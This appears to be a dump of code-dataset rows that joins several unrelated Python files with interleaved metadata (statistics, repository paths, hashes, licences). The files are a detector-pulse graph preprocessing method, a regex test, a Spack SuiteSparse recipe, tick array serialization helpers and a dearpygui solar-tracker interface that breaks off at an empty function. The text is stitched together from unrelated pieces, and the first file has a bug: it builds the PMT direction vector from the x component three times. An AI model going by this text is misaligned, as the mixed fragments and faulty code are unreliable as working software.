def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Assign pulse cluster indices to DOMs and PMTs, respectively
data = group_pulses_to_dom(data)
data = group_pulses_to_pmt(data)
# Feature engineering inspired by Linea Hedemark and Tetiana Kozynets.
xyz = torch.stack((data['dom_x'], data['dom_y'], data['dom_z']), dim=1)
pmt_dir = torch.stack((data['pmt_dir_x'], data['pmt_dir_x'], data['pmt_dir_x']), dim=1)
charge = data['charge'].unsqueeze(dim=1)
center_of_gravity = sum_pool_and_distribute(xyz * charge, data.batch) / sum_pool_and_distribute(charge, data.batch)
vector_to_center_of_gravity = center_of_gravity - xyz
distance_to_center_of_gravity = torch.norm(vector_to_center_of_gravity, p=2, dim=1)
unit_vector_to_center_of_gravity = vector_to_center_of_gravity / (distance_to_center_of_gravity.unsqueeze(dim=1) + 1e-3)
cos_angle_wrt_center_of_gravity = (pmt_dir * unit_vector_to_center_of_gravity).sum(dim=1)
photoelectrons_on_pmt = sum_pool_and_distribute(data['charge'], data.pmt_index, data.batch).floor().clip(1, None)
# Add new features
data.x = torch.cat((
data.x,
photoelectrons_on_pmt.unsqueeze(dim=1),
distance_to_center_of_gravity.unsqueeze(dim=1),
cos_angle_wrt_center_of_gravity.unsqueeze(dim=1),
), dim=1)
# Preprocessing
data.x[:,0] /= 500. # dom_x
data.x[:,1] /= 500. # dom_y
data.x[:,2] /= 500. # dom_z
data.x[:,3] /= 2e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,4] = torch.log10(data.x[:,4]) / 2. # charge
#data.x[:,5] /= 1. # rde
data.x[:,6] /= 0.05 # pmt_area
data.x[:,7] -= 50. # string
data.x[:,7] /= 50.
data.x[:,8] /= 20. # pmt_number
data.x[:,9] -= 60. # dom_number
data.x[:,9] /= 60.
#data.x[:,10] /= 1. # pmt_dir_x
#data.x[:,11] /= 1. # pmt_dir_y
#data.x[:,12] /= 1. # pmt_dir_z
data.x[:,13] /= 130. # dom_type
# -- Engineered features
data.x[:,14] = torch.log10(data.x[:,14]) / 2. # photoelectrons_on_pmt
data.x[:,15] = torch.log10(1e-03 + data.x[:,15]) / 2. # distance_to_center_of_gravity
return data
| 33.713376
| 128
| 0.575477
| 5,028
| 0.949934
| 0
| 0
| 69
| 0.013036
| 0
| 0
| 1,816
| 0.343095
|
429945dde445e0205f0ceeefa695def22a8e1795
| 450
|
py
|
Python
|
tests/routes_parsing/test1.py
|
hellojoechip/bambleweeny
|
ef65f574081eb169aef5a2f7363c3f8ba9ebf028
|
[
"MIT"
] | 22
|
2018-09-30T12:08:09.000Z
|
2020-11-18T06:32:01.000Z
|
tests/routes_parsing/test1.py
|
hellojoechip/bambleweeny
|
ef65f574081eb169aef5a2f7363c3f8ba9ebf028
|
[
"MIT"
] | 34
|
2018-09-13T14:54:21.000Z
|
2020-03-26T18:26:26.000Z
|
tests/routes_parsing/test1.py
|
hellojoechip/bambleweeny
|
ef65f574081eb169aef5a2f7363c3f8ba9ebf028
|
[
"MIT"
] | 17
|
2018-10-07T15:41:50.000Z
|
2021-12-10T10:29:02.000Z
|
import re
t1 = 'Data !@[value1] and also !@[system:uptime] testing.'
print("Content: " + t1)
if re.search('!@\[[_a-zA-Z0-9:]*\]', t1):
print("YES")
else:
print("NO")
o = re.sub('!@\[[_a-zA-Z0-9:]*\]', '_B9yPrsE_\\g<0>_B9yPrsE_', t1)
o2 = o.split("_B9yPrsE_")
for i in o2:
if i.startswith("!@["):
i2 = re.sub('[^\w:]', "", i)
print("Parse: " + str(i) + " " +str(i2))
else:
print("Plain: '" + str(i) + "'")
| 21.428571
| 66
| 0.482222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 194
| 0.431111
|
429a7f070688a75a8c4a4c449d4d3474a9a7088a
| 5,430
|
py
|
Python
|
internal/notes/builtin-SAVE/packages/suite-sparse/package.py
|
HPCToolkit/hpctest
|
5ff4455582bf39e75530a31badcf6142081b386b
|
[
"BSD-3-Clause"
] | 1
|
2019-01-17T20:07:19.000Z
|
2019-01-17T20:07:19.000Z
|
internal/notes/builtin-SAVE/packages/suite-sparse/package.py
|
HPCToolkit/hpctest
|
5ff4455582bf39e75530a31badcf6142081b386b
|
[
"BSD-3-Clause"
] | null | null | null |
internal/notes/builtin-SAVE/packages/suite-sparse/package.py
|
HPCToolkit/hpctest
|
5ff4455582bf39e75530a31badcf6142081b386b
|
[
"BSD-3-Clause"
] | 2
|
2019-08-06T18:13:57.000Z
|
2021-11-05T18:19:49.000Z
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class SuiteSparse(Package):
"""
SuiteSparse is a suite of sparse matrix algorithms
"""
homepage = 'http://faculty.cse.tamu.edu/davis/suitesparse.html'
url = 'http://faculty.cse.tamu.edu/davis/SuiteSparse/SuiteSparse-4.5.1.tar.gz'
version('4.5.5', '0a5b38af0016f009409a9606d2f1b555')
version('4.5.4', 'f6ab689442e64a1624a47aa220072d1b')
version('4.5.3', '8ec57324585df3c6483ad7f556afccbd')
version('4.5.1', 'f0ea9aad8d2d1ffec66a5b6bfeff5319')
variant('tbb', default=False, description='Build with Intel TBB')
variant('pic', default=True, description='Build position independent code (required to link with shared libraries)')
variant('cuda', default=False, description='Build with CUDA')
variant('openmp', default=False, description='Build with OpenMP')
depends_on('blas')
depends_on('lapack')
depends_on('metis@5.1.0', when='@4.5.1:')
# in @4.5.1. TBB support in SPQR seems to be broken as TBB-related linkng
# flags does not seem to be used, which leads to linking errors on Linux.
depends_on('tbb', when='@4.5.3:+tbb')
depends_on('cuda', when='+cuda')
patch('tbb_453.patch', when='@4.5.3:+tbb')
# This patch removes unsupported flags for pgi compiler
patch('pgi.patch', when='%pgi')
def install(self, spec, prefix):
# The build system of SuiteSparse is quite old-fashioned.
# It's basically a plain Makefile which include an header
# (SuiteSparse_config/SuiteSparse_config.mk)with a lot of convoluted
# logic in it. Any kind of customization will need to go through
# filtering of that file
pic_flag = self.compiler.pic_flag if '+pic' in spec else ''
make_args = [
'INSTALL=%s' % prefix,
# By default, the Makefile uses the Intel compilers if
# they are found. The AUTOCC flag disables this behavior,
# forcing it to use Spack's compiler wrappers.
'AUTOCC=no',
# CUDA=no does NOT disable cuda, it only disables internal search
# for CUDA_PATH. If in addition the latter is empty, then CUDA is
# completely disabled. See
# [SuiteSparse/SuiteSparse_config/SuiteSparse_config.mk] for more.
'CUDA=no',
'CUDA_PATH=%s' % (spec['cuda'].prefix if '+cuda' in spec else ''),
'CFOPENMP=%s' % (self.compiler.openmp_flag
if '+openmp' in spec else ''),
'CFLAGS=-O3 %s' % pic_flag,
# Both FFLAGS and F77FLAGS are used in SuiteSparse makefiles;
# FFLAGS is used in CHOLMOD, F77FLAGS is used in AMD and UMFPACK.
'FFLAGS=%s' % pic_flag,
'F77FLAGS=%s' % pic_flag,
# use Spack's metis in CHOLMOD/Partition module,
# otherwise internal Metis will be compiled
'MY_METIS_LIB=%s' % spec['metis'].libs.ld_flags,
'MY_METIS_INC=%s' % spec['metis'].prefix.include,
# Make sure Spack's Blas/Lapack is used. Otherwise System's
# Blas/Lapack might be picked up. Need to add -lstdc++, following
# with the TCOV path of SparseSuite 4.5.1's Suitesparse_config.mk,
# even though this fix is ugly
'BLAS=%s' % (spec['blas'].libs.ld_flags + (
'-lstdc++' if '@4.5.1' in spec else '')),
'LAPACK=%s' % spec['lapack'].libs.ld_flags,
]
# SuiteSparse defaults to using '-fno-common -fexceptions' in
# CFLAGS, but not all compilers use the same flags for these
# optimizations
if any([x in spec
for x in ('%clang', '%gcc', '%intel')]):
make_args += ['CFLAGS+=-fno-common -fexceptions']
elif '%pgi' in spec:
make_args += ['CFLAGS+=--exceptions']
if '%xl' in spec or '%xl_r' in spec:
make_args += ['CFLAGS+=-DBLAS_NO_UNDERSCORE']
# Intel TBB in SuiteSparseQR
if 'tbb' in spec:
make_args += [
'SPQR_CONFIG=-DHAVE_TBB',
'TBB=-L%s -ltbb' % spec['tbb'].prefix.lib,
]
make('install', *make_args)
| 44.876033
| 122
| 0.618416
| 4,172
| 0.768324
| 0
| 0
| 0
| 0
| 0
| 0
| 3,703
| 0.681952
|
429b606cd5d96a46f963693074a289b595badea4
| 4,580
|
py
|
Python
|
tick/array/serialize.py
|
andro2157/tick
|
d22d0e70c8bb2d5b232ffa7b97426010c2328edc
|
[
"BSD-3-Clause"
] | null | null | null |
tick/array/serialize.py
|
andro2157/tick
|
d22d0e70c8bb2d5b232ffa7b97426010c2328edc
|
[
"BSD-3-Clause"
] | null | null | null |
tick/array/serialize.py
|
andro2157/tick
|
d22d0e70c8bb2d5b232ffa7b97426010c2328edc
|
[
"BSD-3-Clause"
] | null | null | null |
# License: BSD 3 clause
import os
import numpy as np
import scipy
from tick.array.build.array import (
tick_float_array_to_file,
tick_float_array2d_to_file,
tick_float_sparse2d_to_file,
tick_double_array_to_file,
tick_double_array2d_to_file,
tick_double_sparse2d_to_file,
tick_float_array_from_file,
tick_float_array2d_from_file,
tick_float_sparse2d_from_file,
tick_double_array_from_file,
tick_double_array2d_from_file,
tick_double_sparse2d_from_file,
)
def serialize_array(array, filepath):
"""Save an array on disk on a format that tick C++ modules can read
This method is intended to be used by developpers only, mostly for
benchmarking in C++ on real datasets imported from Python
Parameters
----------
array : `np.ndarray` or `scipy.sparse.csr_matrix`
1d or 2d array
filepath : `str`
Path where the array will be stored
Returns
-------
path : `str`
Global path of the serialized array
"""
if array.dtype not in [np.float32, np.float64]:
raise ValueError('Only float32/64 arrays can be serrialized')
if array.dtype == "float32":
if isinstance(array, np.ndarray):
if len(array.shape) == 1:
serializer = tick_float_array_to_file
elif len(array.shape) == 2:
serializer = tick_float_array2d_to_file
else:
raise ValueError('Only 1d and 2d arrays can be serrialized')
else:
if len(array.shape) == 2:
serializer = tick_float_sparse2d_to_file
else:
raise ValueError('Only 2d sparse arrays can be serrialized')
elif array.dtype == "float64" or array.dtype == "double":
if isinstance(array, np.ndarray):
if len(array.shape) == 1:
serializer = tick_double_array_to_file
elif len(array.shape) == 2:
serializer = tick_double_array2d_to_file
else:
raise ValueError('Only 1d and 2d arrays can be serrialized')
else:
if len(array.shape) == 2:
serializer = tick_double_sparse2d_to_file
else:
raise ValueError('Only 2d sparse arrays can be serrialized')
else:
raise ValueError('Unhandled serrialization type')
serializer(filepath, array)
return os.path.abspath(filepath)
def load_array(filepath, array_type='dense', array_dim=1, dtype="float64"):
"""Loaf an array from disk from a format that tick C++ modules can read
This method is intended to be used by developpers only, mostly for
benchmarking in C++ on real datasets imported from Python
Parameters
----------
filepath : `str`
Path where the array was stored
array_type : {'dense', 'sparse'}, default='dense'
Expected type of the array
array_dim : `int`
Expected dimension of the array
Returns
-------
array : `np.ndarray` or `scipy.sparse.csr_matrix`
1d or 2d array
"""
abspath = os.path.abspath(filepath)
if not os.path.exists(filepath):
raise FileNotFoundError('File {} does not exists'.format(abspath))
if dtype == "float32":
if array_type == 'dense':
if array_dim == 1:
reader = tick_float_array_from_file
elif array_dim == 2:
reader = tick_float_array2d_from_file
else:
raise ValueError('Only 1d and 2d arrays can be loaded')
elif array_type == 'sparse':
if array_dim == 2:
reader = tick_float_sparse2d_from_file
else:
raise ValueError('Only 2d sparse arrays can be loaded')
else:
raise ValueError('Cannot load this class of array')
elif dtype == "float64" or dtype == "double":
if array_type == 'dense':
if array_dim == 1:
reader = tick_double_array_from_file
elif array_dim == 2:
reader = tick_double_array2d_from_file
else:
raise ValueError('Only 1d and 2d arrays can be loaded')
elif array_type == 'sparse':
if array_dim == 2:
reader = tick_double_sparse2d_from_file
else:
raise ValueError('Only 2d sparse arrays can be loaded')
else:
raise ValueError('Cannot load this class of array')
else:
raise ValueError('Unhandled serrialization type')
return reader(filepath)
| 32.94964
| 76
| 0.613974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,662
| 0.362882
|
429b9b03d73a5f7f9bbccc750f09ea936a25f8a0
| 78
|
py
|
Python
|
__init__.py
|
bbockelm/glideinWMS
|
a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18
|
[
"BSD-3-Clause"
] | null | null | null |
__init__.py
|
bbockelm/glideinWMS
|
a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18
|
[
"BSD-3-Clause"
] | 3
|
2015-12-02T19:37:45.000Z
|
2016-01-20T03:21:48.000Z
|
__init__.py
|
bbockelm/glideinWMS
|
a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18
|
[
"BSD-3-Clause"
] | 1
|
2015-12-01T23:02:41.000Z
|
2015-12-01T23:02:41.000Z
|
__all__=["factory","frontend","lib","tools","creation","install","unittests"]
| 39
| 77
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 61
| 0.782051
|
429beefc88e6c9cf72106405ad5b6e321025f9d6
| 20,658
|
py
|
Python
|
views/menuVisualizacaoGeral.py
|
iOsnaaente/Tracker-solar-Supervisorio
|
9790c34f0d9df283bc1b92f79b2807875dbcfe3e
|
[
"MIT"
] | 2
|
2022-01-29T21:33:12.000Z
|
2022-02-01T12:41:35.000Z
|
views/menuVisualizacaoGeral.py
|
iOsnaaente/Tracker-solar-Supervisorio
|
9790c34f0d9df283bc1b92f79b2807875dbcfe3e
|
[
"MIT"
] | null | null | null |
views/menuVisualizacaoGeral.py
|
iOsnaaente/Tracker-solar-Supervisorio
|
9790c34f0d9df283bc1b92f79b2807875dbcfe3e
|
[
"MIT"
] | null | null | null |
import dearpygui.dearpygui as dpg
import datetime as dt
import math
from registry import *
SUN_DATA.update_date()
# FUNCTIONS
def get_semi_circle_points( center, radius, angle_i, angle_f, segments = 360, closed = False ):
points_close = [[ center[0], center[1]-radius ] , center, [ center[0] + radius, center[1] ] ]
angles = [ ((angle_f - angle_i)/segments)*n for n in range(segments) ]
points = [ [ center[0] + radius*math.cos(ang), center[1] - radius*math.sin(ang) ] for ang in angles ]
if closed:
points_close.extend( points )
return points_close
else:
return points
def draw_sun_trajetory( draw_id, parent_id, all_day = False, extremes = False ):
# Ponto central, dimensões da tela e Raio
width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
center = [ width//2, height//2 ]
r = width//2 - 20 if width+20 <= height else height//2 - 20
id_link = draw_id*100
# DESENHO DA LINHA DE NASCER DO SOL E POR DO SOL
azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
# PEGA OS ANGULOS NOS PONTOS DA TRAJETÓRIA DO SOL
dots = SUN_DATA.trajetory(100, all_day )
# PONTOS DE ACORDO COM Azimute - Altitude
dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
# DESENHO DO SOL NA SUA POSIÇÃO
sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
dpg.draw_line( parent = draw_id, tag = id_link+1 , p1 = [center[0] - r, center[1]] , p2 = [center[0] + r, center[1]] , color = COLOR['gray'](155) , thickness = 1 )
dpg.draw_line( parent = draw_id, tag = id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)], color = COLOR['orange'](155), thickness = 2 )
dpg.draw_line( parent = draw_id, tag = id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)], color = COLOR['gray'](200) , thickness = 2 )
dpg.draw_circle( parent = draw_id, tag = id_link+4 , center = center , radius = r , color = COLOR['white'](200) , fill = COLOR['white'](10 ), thickness = 3 )
dpg.draw_circle( parent = draw_id, tag = id_link+5 , center = center , radius = 3 , color = COLOR['white'](200) , fill = COLOR['white'](255), thickness = 2 )
dpg.draw_text( parent = draw_id, tag = id_link+6 , pos = [center[0] -(r +20), center[1] -10 ] , text = 'W' , color = COLOR['white'](200) , size = 20 )
dpg.draw_text( parent = draw_id, tag = id_link+7 , pos = [center[0] +(r +5) , center[1] -10 ] , text = 'E' , color = COLOR['white'](200) , size = 20 )
dpg.draw_text( parent = draw_id, tag = id_link+8 , pos = [center[0] -10 , center[1] -(r +25)], text = 'N' , color = COLOR['white'](255) , size = 20 )
dpg.draw_polyline( parent = draw_id, tag = id_link+9 , points = dots , color = COLOR['red'](155) , thickness = 2 , closed = False )
for n, p in enumerate(dots):
dpg.draw_circle( parent = draw_id, tag = id_link+(12+n) , center = p , radius = 2 , color = [n*4, 255-n*2, n*2, 255] )
dpg.draw_line( parent = draw_id, tag = id_link+10 , p1 = center, p2 = sun, color = COLOR['yellow'](200) , thickness = 2 )
dpg.draw_circle( parent = draw_id, tag = id_link+11 , center = sun , radius = 10 , color = COLOR['yellow'](155) , fill = COLOR['yellow'](255) )
def update_sun_trajetory( draw_id, parent_id, all_day = False ):
# Ponto central, dimensões da tela e Raio
width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
w, h = dpg.get_item_width( 'mainWindow' ) , dpg.get_item_height('mainWindow' )
center = [ width//2, height//2 ]
r = width//2 - 20 if width+20 <= height else height//2 - 20
id_link = draw_id*100
# DESENHO DA LINHA DE NASCER DO SOL E POR DO SOL
azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
# PEGA OS ANGULOS NOS PONTOS DA TRAJETÓRIA DO SOL
dots = SUN_DATA.trajetory(100, all_day )
dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
# DESENHO DO SOL NA SUA POSIÇÃO
sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
# DESENHO ESTÁTICO
dpg.configure_item( id_link+1 , p1 = [center[0] - r, center[1]], p2 = [center[0] + r, center[1]] )
dpg.configure_item( id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)] )
dpg.configure_item( id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)] )
dpg.configure_item( id_link+4 , center = center , radius = r )
dpg.configure_item( id_link+5 , center = center , radius = 3 )
dpg.configure_item( id_link+6 , pos = [center[0] - (r + 20), center[1] -10 ] )
dpg.configure_item( id_link+7 , pos = [center[0] + (r + 5), center[1] -10 ] )
dpg.configure_item( id_link+8 , pos = [center[0] - 10 , center[1] - (r + 25) ] )
dpg.configure_item( id_link+9 , points = dots )
dpg.configure_item( id_link+10, p1 = center , p2 = sun )
dpg.configure_item( id_link+11, center = sun )
for n, p in enumerate(dots):
dpg.configure_item( id_link+(12+n) , center = p )
def att_sunpos_graphs( ):
last_date = SUN_DATA.date
if not dpg.get_value( HORA_MANUAL ): SUN_DATA.set_date( dt.datetime.utcnow() )
else: SUN_DATA.set_date( dt.datetime( dpg.get_value(YEAR), dpg.get_value(MONTH), dpg.get_value(DAY), dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND) ) )
azi_alt = SUN_DATA.trajetory( 50, all_day = False )
SUN_DATA.set_date( last_date )
AZI = []
ALT = []
PTI = []
for azi, alt, tim in azi_alt:
AZI.append( math.degrees(azi - math.pi) if azi > math.pi else math.degrees(azi + math.pi) )
ALT.append( math.degrees(alt) if alt < math.pi else 0 )
PTI.append( int( dt.datetime.timestamp( tim )) )
azi, alt = [math.degrees(SUN_DATA.azi)], [math.degrees(SUN_DATA.alt)]
time_scrt = [math.degrees(dt.datetime.timestamp( last_date ))]
SUN_DATA.set_date( last_date )
dpg.configure_item (22_13, x = PTI , y = AZI )
dpg.configure_item (22_14, x = time_scrt, y = azi )
dpg.set_axis_limits(22_11, ymin = PTI[0] , ymax = PTI[-1] )
dpg.configure_item (22_23, x = PTI , y = ALT )
dpg.configure_item (22_24, x = time_scrt, y = alt )
dpg.set_axis_limits(22_21, ymin = PTI[0] , ymax = PTI[-1] )
# MAIN FUNCTIONS
def init_visualizacaoGeral( windows : dict ):
# POSIÇÂO DO SOL
with dpg.window( label = 'Posição solar' , tag = 21_0, pos = [50,50], width = 500 , height = 500 , no_move = True, no_resize = True, no_collapse = True, no_close = True, no_title_bar= True ) as Posicao_sol_VG:
windows["Visualizacao geral"].append( Posicao_sol_VG )
w, h = dpg.get_item_width(2_1_0), dpg.get_item_height(2_1_0)
dpg.add_drawlist ( tag = 21_1_0, width = w-20 , height = h-50, label = 'Solar')
draw_sun_trajetory ( draw_id = 2_1_1_0, parent_id = 2_1_0 )
# VISOR DAS POSIÇÔES DO SOL - USAR GRÀFICOS - MESMO DO TOOLTIP
with dpg.window( label = 'Atuação' , tag = 22_0, no_move = True , no_resize = True, no_collapse = True, no_close = True ) as Atuacao_VG:
windows["Visualizacao geral"].append( Atuacao_VG )
dpg.add_text('Área para a atução da posição dos paineis solares')
with dpg.group( horizontal = True ):
with dpg.plot( tag = 2_2_1_0, label = 'Azimute do dia', height = 312, width = 478, anti_aliased = True ):
dpg.add_plot_legend()
dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_1_1, parent = 2_2_1_0, time = True, no_tick_labels = True ) # X
dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_1_2, parent = 2_2_1_0 ) # Y
dpg.set_axis_limits_auto( 2_2_1_1 )
dpg.set_axis_limits ( 2_2_1_2, -5, 370 )
dpg.add_line_series ( [], [], tag = 2_2_1_3, label = 'Rota diária', parent = 2_2_1_2 )
dpg.add_scatter_series ( [], [], tag = 2_2_1_4, label = 'Ponto atual', parent = 2_2_1_2 )
with dpg.plot( tag = 2_2_2_0, label = 'Altitude do dia', height = 312, width = 478, anti_aliased = True ):
dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_2_1, parent = 2_2_2_0, time = True, no_tick_labels = True ) # X
dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_2_2, parent = 2_2_2_0 ) # Y
dpg.set_axis_limits_auto( 2_2_2_1 )
dpg.set_axis_limits ( 2_2_2_2, -5, 100 )
dpg.add_plot_legend()
dpg.add_line_series ( [], [], tag = 2_2_2_3, label = 'Rota diária', parent = 2_2_2_2 )
dpg.add_scatter_series ( [], [], tag = 2_2_2_4, label = 'Ponto atual', parent = 2_2_2_2 )
att_sunpos_graphs( )
# CONFIGURAÇÔES DE TEMPO - USAR WINDOW NO HOUR_MANUAL
with dpg.window( label = 'Painel de log' , tag = 23_0, no_move = True , no_resize = True, no_collapse = True, no_close = True, no_title_bar = True ) as Painel_log_VG:
windows["Visualizacao geral"].append( Painel_log_VG )
dpg.add_text( default_value = 'Informações gerais do sistema')
with dpg.child_window( tag = 23_00, autosize_x = True, height = 170, menubar = True):
with dpg.menu_bar( tag = 23_01, label = 'menubar para datetime',):
dpg.add_menu_item( tag = 23_02, label = 'Hora automática', callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, False), shortcut = 'A data e hora de calculo é definida automaticamente de acordo com a hora do controlador local')
dpg.add_menu_item( tag = 23_03, label = 'Hora manual' , callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, True ), shortcut = 'A data e hora de calculo é definida pela entrada do operador no supervisório' )
with dpg.child_window( tag = 23_10):
#Informações gerais do sistema - Automático
dpg.add_text( default_value = 'Hora automática')
dpg.add_drag_floatx( tag = 23_1, label = 'Ano/Mes/Dia Auto' , size = 3, format = '%.0f', speed = 0.1 , min_value = 1 , max_value = 3000 , no_input = True )
dpg.add_drag_floatx( tag = 23_2, label = 'Hora/Min/Sec Auto' , size = 3, format = '%.0f', speed = 0.1 , no_input = True )
dpg.add_drag_int ( tag = 23_3, label = 'Valor no dia' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 26*3600, no_input = True, source = TOT_SECONDS, enabled = False)
dpg.add_drag_int ( tag = 23_4, label = 'Dia Juliano' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False)
with dpg.child_window( tag = 23_20):
# Informações gerais do sistema - Manual
dpg.add_text( default_value = 'Hora manual')
dpg.add_input_floatx( tag = 23_6, label = 'Ano/Mes/Dia Manual' , size = 3, default_value = [2020, 12, 25], format='%.0f', min_value = 1, max_value = 3000 )
dpg.add_input_floatx( tag = 23_7, label = 'Hora/Min/Sec Manual', size = 3, default_value = [20, 30, 10] , format='%.0f', min_value = 1, max_value = 60 )
dpg.add_drag_int ( tag = 23_8, label = 'Valor no dia' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 24*3600, no_input = True, source = TOT_SECONDS, enabled = False )
dpg.add_drag_int ( tag = 23_9, label = 'Dia Juliano' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False )
dpg.hide_item( 23_20 ) if dpg.get_value(HORA_MANUAL) == False else dpg.hide_item( 2_3_1_0 )
dpg.add_spacer( height = 5 )
with dpg.child_window( tag = 23_30, autosize_x = True, autosize_y = True ):
# Definições de longitude e latitude local
with dpg.child_window ( height = 90 ):
dpg.add_text ( default_value = 'Definições de longitude e latitude local')
dpg.add_input_float( label = 'Latitude' , tag = 2_3_10, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LATITUDE , callback = lambda sender, data, user : SUN_DATA.set_latitude( data ) )
dpg.add_spacer ( )
dpg.add_input_float( label = 'Longitude', tag = 2_3_11, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LONGITUDE, callback = lambda sender, data, user : SUN_DATA.set_longitude( data ) )
dpg.add_spacer( height = 5 )
with dpg.child_window( height = 150 ):
# Informações do sol
dpg.add_text ( default_value = 'Informacoes do sol')
dpg.add_drag_float ( label = 'Azimute' , tag = 23_12, format = '%4.2f', speed = 1, no_input = True, source = AZIMUTE )
dpg.add_spacer ( )
dpg.add_drag_float ( label = 'Altitude' , tag = 23_13, format = '%4.2f', speed = 1, no_input = True, source = ZENITE )
dpg.add_spacer ( )
dpg.add_drag_float ( label = 'Elevação (m)' , tag = 23_14, format = '%4.0f', speed = 1, no_input = True, source = ALTITUDE )
dpg.add_spacer ( )
dpg.add_drag_floatx( label = 'Horas de sol' , tag = 23_15, size = 3, format = '%.0f', no_input = True )
dpg.add_spacer( height = 5 )
with dpg.child_window( height = 200 ):
# Posições de interesse
dpg.add_text ( default_value = "Posicoes de interesse", )
dpg.add_text ( default_value = 'Nascer do sol (hh/mm/ss)')
dpg.add_drag_floatx( tag = 2_3_16, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNRISE , data.extend([0])) )
dpg.add_spacer ( )
dpg.add_text ( default_value = 'Culminante (hh/mm/ss)' )
dpg.add_drag_floatx( tag = 2_3_17, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNSET , data.extend([0])) )
dpg.add_spacer ( )
dpg.add_text ( default_value = 'Por do sol (hh/mm/ss)' )
dpg.add_drag_floatx( tag = 2_3_18, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_CULMINANT, data.extend([0])) )
dpg.hide_item( 21_0 )
dpg.hide_item( 22_0 )
dpg.hide_item( 23_0 )
def resize_visualizacaoGeral( ):
# get the main_window dimension
w , h = dpg.get_item_width( 'mainWindow' ), dpg.get_item_height( 'mainWindow' )
dpg.configure_item( 21_0 , width = w*2/3 , height = h*3/5 , pos = [10 , 25 ] ) # DRAWING
dpg.configure_item( 22_0 , width = w*2/3 , height = (h*2/5)-35 , pos = [10 , (h*3/5)+30 ] ) # SUNPATH
dpg.configure_item( 23_0 , width = w/3 -20 , height = h - 30 , pos = [ w*2/3 +15, 25 ] ) # LOG
# get the child_window_window dimension
w1, h1 = dpg.get_item_width( 21_0 ), dpg.get_item_height( 21_0 )
dpg.configure_item( 21_10 , width = w1-20 , height = h1-50 ) # DRAWLIST
update_sun_trajetory( draw_id = 2_1_1_0 , parent_id = 2_1_0 ) # DRAWING
# SUNPATH ATT CHILD_WINDOW
dpg.configure_item( 22_10 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ 5 , 20 ] ) # GIRO
dpg.configure_item( 22_20 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ (w*2/3)//2 +5, 20 ] ) # ELEVAÇÃO
def render_visualizacaoGeral( ):
